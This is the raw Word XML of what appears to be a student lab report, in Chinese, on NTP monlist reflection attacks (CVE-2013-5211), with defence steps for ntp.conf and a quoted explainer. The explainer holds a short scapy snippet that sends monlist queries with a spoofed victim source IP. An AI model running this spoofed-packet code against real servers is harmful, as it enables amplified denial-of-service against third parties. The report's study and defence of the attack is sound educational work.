          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntpdc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-n -c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>monlist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C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4BCD24" w14:textId="03336FEA" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="002D4B09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D4B09">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6759087F" wp14:editId="36CC1991">
            <wp:extent cx="5274310" cy="3044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DE9" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B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5、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反射攻击防御</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0792E2A1" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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服务端控制台，停止</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，修改/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntp.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，加入如下行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290CE9B2" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00225426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disable monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6E15C5" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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重启</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D462B0A" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00225426">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="120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 xml:space="preserve">service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C973B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EDFDDE" w14:textId="77777777" w:rsidR="00C973B5" w:rsidRPr="00C973B5" w:rsidRDefault="00C973B5" w:rsidP="00C973B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:num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3B5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在攻击控制台执行exit操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D86390E" w14:textId="27670FDA" w:rsidR="00A048C5" w:rsidRPr="00C973B5" w:rsidRDefault="00A048C5" w:rsidP="00C973B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47B377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实验数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BCACDB" w14:textId="1577BEB1" w:rsidR="00A048C5" w:rsidRDefault="00C57307" w:rsidP="00A048C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>见上图。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F40121F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lastRenderedPageBreak/>
        <w:t>实验数据处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4803EA74" w14:textId="24451EF2" w:rsidR="00A048C5" w:rsidRDefault="00225426" w:rsidP="00A048C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59465103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实验结果与分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799EB701" w14:textId="77777777" w:rsidR="00A048C5" w:rsidRPr="00A1332D" w:rsidRDefault="00A048C5" w:rsidP="00A048C5"/>
    <w:p w14:paraId="1FBF6DEF" w14:textId="59846282" w:rsidR="004F460F" w:rsidRDefault="00C9062E">
      <w:r w:rsidRPr="00C9062E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20BBF064" wp14:editId="4A4BD056">
            <wp:extent cx="5274310" cy="3626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0B50" w14:textId="202C1B1E" w:rsidR="00C9062E" w:rsidRDefault="00C9062E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因cg故障，无法</w:t>
      </w:r>
      <w:r w:rsidR="004C3D97">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成评测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57190665" w14:textId="543E1C00" w:rsidR="004C3D97" w:rsidRDefault="004C3D97" w:rsidP="004C3D9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tp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3D97">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基于网络时间协议（</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3D97">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network Time Protocol）的攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B86E608" w14:textId="77777777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>NTP服务中有一项功能叫MONLIST，是用来监控最近与NTP服务交互的客户端信息的一项功能，本意是好的。但在NTPD v4.2.7p26版本之前，默认情况下大家都可以来用这个功能，而NTP服务本身基于UDP协议，那么就可以伪造源IP地址，让NTP服务返回的查询结果发给伪造的IP，即被攻击IP。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0133BCFE" w14:textId="77777777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>简单而言就是这样：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E607F5" w14:textId="1FDD4EF0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C23B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A1FA844" wp14:editId="4678B5A5">
            <wp:extent cx="5274310" cy="3613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17DF" w14:textId="77777777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>NTP服务通过UDP协议的123端口对外提供服务，但</w:t>
      </w:r>
      <w:r w:rsidRPr="005C23BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.2.7p26</w:t>
      </w:r>
      <w:r w:rsidRPr="005C23BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>版本之前存在一个</w:t>
      </w:r>
      <w:r w:rsidRPr="005C23BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CVE-2013-5211</w:t>
      </w:r>
      <w:r w:rsidRPr="005C23BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的漏洞，一个在安全人员眼里是漏洞，在产品经理眼中是功能的东东。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1578AF35" w14:textId="77777777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>攻击者只需要全网爬下尚未升级NTPD服务的服务器，而后就可以写个简单的程序进行攻击了：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E63149" w14:textId="77777777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 xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C23BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C23BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
      <w:r w:rsidRPr="005C23BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005C23BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>data = "\x17\x00\x03\x2a" + "\x00" * 5</w:t>
      </w:r>
      <w:r w:rsidRPr="005C23BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>send(IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C23BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C23BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">=NTP Server IP, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C23BD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5C23BD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Pr="005C23BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vicim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C23BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server IP)/UDP(sport=2222, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C23BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C23BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=123)/Raw(load=data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FD9DBB" w14:textId="68E54CE2" w:rsidR="005C23BD" w:rsidRPr="005C23BD" w:rsidRDefault="005C23BD" w:rsidP="005C23B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C23BD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>因此，这种攻击也很难追溯攻击源，如果运营商侧能够进行流量监测并直接清洗同目的的大流量NTP响应，那么会极大减少这种影响。而更多的则是需要受影响的NTP服务进行升级，虽然它们本身也是受害者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C5035D" w14:textId="3766149E" w:rsidR="005C23BD" w:rsidRPr="005C23BD" w:rsidRDefault="00873F1D" w:rsidP="004C3D9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资料来源：</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>科普文：NTP反射攻击 - 知乎 (zhihu.com)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="005C23BD" w:rsidRPr="005C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319B" w14:textId="77777777" w:rsidR="002107BB" w:rsidRDefault="002107BB" w:rsidP="00A048C5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="28F34EF6" w14:textId="77777777" w:rsidR="002107BB" w:rsidRDefault="002107BB" w:rsidP="00A0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4205" w14:textId="77777777" w:rsidR="002107BB" w:rsidRDefault="002107BB" w:rsidP="00A048C5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5F30033F" w14:textId="77777777" w:rsidR="002107BB" w:rsidRDefault="002107BB" w:rsidP="00A0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47A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E81A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B7C6B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D0B8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B7CCB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78D2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31D48"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBC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251DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="837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B7464"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BDC4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06B9B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F3E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871F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9596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E4EAD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15F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67FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC5C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07E96"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="77507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41394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525204">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="154146600">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="414519857">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="636447722">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="276261069">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1581134187">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="493648715">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="942348846">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="422916304">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1359892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85"/>
    <w:rsid w:val="00040959"/>
    <w:rsid w:val="001B5927"/>
    <w:rsid w:val="001E0AB0"/>
    <w:rsid w:val="002107BB"/>
    <w:rsid w:val="00225426"/>
    <w:rsid w:val="002D4B09"/>
    <w:rsid w:val="00302512"/>
    <w:rsid w:val="00380EB7"/>
    <w:rsid w:val="004B686C"/>
    <w:rsid w:val="004C3D97"/>
    <w:rsid w:val="004D1AF5"/>
    <w:rsid w:val="004F460F"/>
    <w:rsid w:val="005C23BD"/>
    <w:rsid w:val="006116D1"/>
    <w:rsid w:val="00873F1D"/>
    <w:rsid w:val="00903AFB"/>
    <w:rsid w:val="00A048C5"/>
    <w:rsid w:val="00C57307"/>
    <w:rsid w:val="00C9062E"/>
    <w:rsid w:val="00C973B5"/>
    <w:rsid w:val="00CF534F"/>
    <w:rsid w:val="00DB21F3"/>
    <w:rsid w:val="00E94585"/>
    <w:rsid w:val="00F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EA23E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{563CE148-EA67-4CF5-8EA1-9BD4020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8C5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A048C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8C5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04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27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873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191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880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3060112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san</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>zhang san</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-20T02:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-28T10:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>